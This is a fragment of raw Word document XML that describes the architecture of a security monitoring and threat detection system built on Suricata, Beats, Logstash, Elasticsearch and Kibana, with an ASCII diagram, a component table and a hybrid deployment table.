    <w:p w14:paraId="62C82FEC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        ┌────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E350DE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │   Cloud (Elastic Cloud / AWS EC2) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA23037" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │────────────────────────│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20601B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │  Elasticsearch Cluster │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113D980" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │  Kibana (Dashboard)    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C00B4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │  Detection Rules (MITRE)│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0303E73D" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │  Alert Engine (Webhook/API) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CACD93" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        └────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>───────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3D6602" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F30E5" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                   Alert &amp; Detection │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8396B0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45389B14" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        ┌──────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A23080" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │ Local Environment (On-Premises / Laptops)    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142B5700" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │──────────────────────────────────────────────│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB54CD3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │  ┌───────────────┐   ┌──────────────┐         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5132D7" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │  │ Log Sources    │ → │ Log Shippers │         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39182312" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │  │ (Suricata, OS, │   │ (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>,   │         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E062F85" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        │  │ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">)    │   │ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004536D2">
        <w:t>)  │         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59F42E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │  └───────────────┘   └──────────────┘         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF97415" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │           │                 │                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE72EB6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │           </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7B0DE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │     ┌────────────────────────────┐             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4909B1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │     │   Logstash (Parsing,       │             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005AB5B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │     │   Normalization, Enrich)   │             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BBD05" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │     └──────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>─────────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF1F24" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │                    │                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA7601" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        │     Threat Rules JSON │                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054DDA9C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">        └───────────────────────┘                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C848C6" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C8CF4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                                     </w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD828E2" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        ┌────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA54170" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │ Security Analyst Tools │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC4FA3" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │ Kibana Dashboards, Maps│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4217F3E9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        │, Alerts &amp; Reports       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF5075D" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
      <w:r w:rsidRPr="004536D2">
        <w:t xml:space="preserve">                        └────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72284CD4" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="32CA4252">
          <v:rect id="_x0000_i1161" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F185D40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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Component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3505"/>
        <w:gridCol w:w="3304"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="6CA53F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E1A05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BF90D60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831ABB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Example Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="2463C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CA6B" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A112E3C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Generate system/network logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20277297" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Suricata, Windows Event Viewer, Linux syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="3D936F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5C654" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Log Shippers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18563E96" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Forward logs securely to Logstash.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FABD191" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>Filebeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>Winlogbeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="67D4ED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5567" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Logstash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45493F89" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Parses, enriches, and formats logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261752EC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve">Logstash + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>GeoIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004536D2">
              <w:t>ThreatIntel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004536D2">
              <w:t xml:space="preserve"> filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="799FD4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D9879" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BF4961" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Stores and indexes data for searching.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="096EC59D" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Elastic Cloud / Docker Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="3395B0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42E0" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detection Rules Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="760346CA" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Runs queries to identify suspicious patterns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76BFB528" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Elastic Detection Rules / Sigma Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="2E5B2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EFB6E" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kibana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E2061A9" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Displays dashboards, alerts, and visual insights.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B4F5ACC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Elastic Kibana</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="06694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80C81" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Alerting Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01C4A502" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Sends notifications to analysts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FFADFD1" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Slack, Email, Webhooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="524B4E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B7326" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security Analyst Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56AD3ABE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Allows analysts to monitor real-time events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB35EDE" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Kibana + MITRE ATT&amp;CK visual overlay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E07D024" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="00000000" w:rsidP="004536D2">
      <w:r>
        <w:pict w14:anchorId="145F0AC0">
          <v:rect id="_x0000_i1162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC8CBB1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☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="004536D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hybrid Deployment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875"/>
        <w:gridCol w:w="2895"/>
      </w:tblGrid>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="77A806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B449B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02C3B92B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9A34558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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="01E2ED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42CC" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Local Machine / VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="253C364C" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Development, testing of Logstash and Beats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11FBBF34" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Docker setup (or manual install)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004536D2" w:rsidRPr="004536D2" w14:paraId="38B28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2D062" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Elastic Cloud (or AWS EC2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BF14067" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Production deployment of Elasticsearch + Kibana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5140A97A" w14:textId="77777777" w:rsidR="004536D2" w:rsidRPr="004536D2" w:rsidRDefault="004536D2" w:rsidP="004536D2">
            <w:r w:rsidRPr="004536D2">
              <w:t>Free-tier instance / 14-day trial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
